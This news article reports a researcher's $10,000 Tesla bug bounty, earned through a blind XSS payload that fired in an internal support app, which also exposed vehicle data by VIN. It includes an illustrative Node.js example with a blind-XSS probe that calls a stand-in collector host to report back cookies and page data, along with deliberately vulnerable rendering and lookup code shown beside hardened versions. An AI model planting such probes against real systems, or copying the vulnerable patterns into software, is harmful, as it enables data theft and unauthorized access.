CIO

Huge rock, cracked windshield helps hacker land a $10k Tesla security bug

No one wants an expensive repair after a rock hits their car's windshield, but for one security researcher, a "huge rock" that cracked his Tesla's windscreen led him to a security flaw worth $10,000.

Web application security researcher Sam Curry said he earned a $10,000 reward from Tesla's bug bounty program for a discovery he owes to a cracked windshield, a repair that can cost $1,000 or more.

The reward is at the higher end of Tesla's bug bounty program, whose payouts have grown gradually: it started with a $1,000 cap in 2014, and last year the maximum was raised to $15,000.

Curry bought a Tesla Model 3 and earlier this year started trying to hack it, focusing initially on the custom web browser in its infotainment system, in which bugs earned two hackers an actual Model 3 last year. The browser was an obvious place to start but didn't produce any results.

Curry said he wasn't able to get the browser "to do anything even remotely interesting" and had almost given up on hacking his own Model 3. He had, however, forgotten that before April he had planted payloads against his own vehicle using an open source tool called XSS Hunter, which is designed to catch blind cross-site scripting (XSS): the payload sits dormant in stored data and only reports back if some web app ever renders it unescaped and a browser executes it.

But one month ago, like a grasshopper drawn to a vehicle's headlights, a "huge rock" slammed into Curry's Tesla and cracked the windshield. What would normally be nothing more than an expensive incident helped him find the $10,000 software bug he had been fishing for.

The cracked windscreen led Curry to a URL he would not have come across had he not needed support from Tesla for the damage. The page appears to belong to a web app that Tesla engineers use internally to communicate with customer vehicles.

"One of the agents responding to my cracked windshield fired my XSS hunter payload from within the context of the 'garage.vn.teslamotors.com' domain," Curry wrote, referring to the internal domain on which his dormant payload finally executed.

That page was a serious issue: it could have allowed someone with less benign motives to view "vital" vehicle statistics for many Tesla owners simply by adding an extra character to the vehicle identification number (VIN) in the URL, with no check that the caller was entitled to see that vehicle.
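To make the two weaknesses concrete, here is an added example (my own illustrative code, not Tesla's application or anything from Curry's write-up) modelling a hypothetical internal support app in Node.js. It covers both the blind XSS sink that XSS Hunter payloads are planted to find (customer text rendered unescaped into the agent's page, beside an escaped version) and a telemetry lookup that trusts the VIN in the URL, beside one that validates the VIN and authorizes the caller before answering. The callback host, URL path shape, VINs, ticket and telemetry fields are all constructed assumptions; nothing is known about the real app beyond what the article reports.

```javascript
// Added example (not Tesla's code, not from Sam Curry's write-up): a toy model
// of a hypothetical internal vehicle-support app showing, with a hardened
// version beside each, the two weakness classes the article describes:
//   1. a stored (blind) XSS sink: customer text rendered unescaped into the
//      page a support agent views, so a planted probe runs in that app's origin;
//   2. an IDOR: vehicle telemetry looked up by the VIN taken from the URL with
//      no check that the caller may see that vehicle.
// All hosts, VINs, ticket and telemetry values are constructed for illustration.

// A blind-XSS probe of the kind XSS Hunter plants. Nothing happens when you
// submit it; if some page later renders it unescaped, the victim's browser
// loads probe.js from your collector (hypothetical host), which reports the
// page origin, URL, cookies and a DOM snapshot back to you.
const CALLBACK_HOST = 'xss.collector.example'; // assumption: your own server
const BLIND_XSS_PROBE = `"><script src="https://${CALLBACK_HOST}/probe.js"></script>`;

// Constructed sample data: two customers' vehicles, keyed by VIN.
const vehicles = new Map([
  ['5YJ3E1EA7KF000001', { ownerId: 'cust-1', speed: 0, tirePressurePsi: [42, 42, 41, 42], locked: true, firmware: '2020.16.2' }],
  ['5YJ3E1EA7KF000002', { ownerId: 'cust-2', speed: 65, tirePressurePsi: [40, 41, 40, 40], locked: false, firmware: '2020.12.5' }],
]);

// A support ticket whose free-text note carries the probe. The customer files
// it; a support agent later opens it in the internal app.
const ticket = {
  id: 'T-100',
  vin: '5YJ3E1EA7KF000001',
  customerId: 'cust-1',
  assignedAgent: 'agent-7',
  note: `Windshield cracked by a rock on the highway. ${BLIND_XSS_PROBE}`,
};

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// 1a. Vulnerable: the note goes straight into the agent's page. When the agent
// opens the ticket, the probe executes with the internal app's origin.
function renderTicketVulnerable(t) {
  return `<div class="ticket" data-vin="${t.vin}"><p>${t.note}</p></div>`;
}

// 1b. Hardened: every untrusted value is HTML-escaped for the context it lands in.
function renderTicketSafe(t) {
  return `<div class="ticket" data-vin="${escapeHtml(t.vin)}"><p>${escapeHtml(t.note)}</p></div>`;
}

// Shape of a VIN: 17 characters, digits and letters except I, O and Q.
// (Checks only the format, not the check digit.)
const VIN_RE = /^[A-HJ-NPR-Z0-9]{17}$/;

// Path shape assumed for the example: /vehicle/<vin>/stats
function vinFromPath(urlPath) {
  return urlPath.split('/')[2];
}

// 2a. Vulnerable: the VIN from the URL is the whole lookup key. Anyone who can
// reach the endpoint reads any vehicle's telemetry just by changing the VIN.
function vehicleStatsVulnerable(urlPath) {
  const vin = vinFromPath(urlPath);
  const v = vehicles.get(vin);
  return v ? { vin, ...v } : null;
}

// 2b. Hardened: validate the identifier, then authorize the caller against the
// record before returning it. A customer may read only their own vehicle; an
// agent only vehicles on tickets assigned to them. Missing and forbidden both
// answer 'not found' so the endpoint cannot be used to enumerate valid VINs.
function vehicleStatsSafe(caller, urlPath, tickets) {
  const vin = vinFromPath(urlPath);
  if (!VIN_RE.test(vin)) return { error: 'invalid vin' };
  const v = vehicles.get(vin);
  const allowed = v && (
    (caller.role === 'customer' && v.ownerId === caller.id) ||
    (caller.role === 'agent' && tickets.some((t) => t.vin === vin && t.assignedAgent === caller.id))
  );
  if (!allowed) return { error: 'not found' };
  // Return only the fields the support task needs, not the whole record.
  const { speed, tirePressurePsi, locked, firmware } = v;
  return { vin, speed, tirePressurePsi, locked, firmware };
}

// Exercises both pairs; returns the results so they can be inspected or tested.
function demo() {
  const agent = { id: 'agent-7', role: 'agent' };
  const otherVehicle = '/vehicle/5YJ3E1EA7KF000002/stats';
  return {
    vulnerableHtmlRunsProbe: renderTicketVulnerable(ticket).includes('<script'),
    safeHtmlRunsProbe: renderTicketSafe(ticket).includes('<script'),
    idorOtherOwner: vehicleStatsVulnerable(otherVehicle),            // leaks cust-2's data
    safeOtherOwner: vehicleStatsSafe(agent, otherVehicle, [ticket]), // { error: 'not found' }
    safeAssigned: vehicleStatsSafe(agent, '/vehicle/5YJ3E1EA7KF000001/stats', [ticket]),
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

Run it with `node` to see both halves: the escaped render neutralises the probe, and the hardened lookup answers the same "not found" for a vehicle the agent is not assigned to as it would for a nonexistent VIN. The point of the fix for the lookup is the authorization check, not hiding or obfuscating the identifier; a VIN is printed on every dashboard and is not a secret.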

The XSS Hunter snapshot Curry received included his vehicle's "speed, temperature, version number, tire pressure, whether it was locked, alerts, and many more little tidbits of information."

There were also details about his vehicle's "firmware, CAN viewers, geofence locations, configurations, and code-names for Tesla software features." CAN refers to the Controller Area Network, the internal bus over which a modern vehicle's electronic control units talk to each other and a component hackers have targeted in the past.

According to Curry, Tesla pushed out a fix within 12 hours of his first bug report, and he subsequently couldn't reproduce the flaw.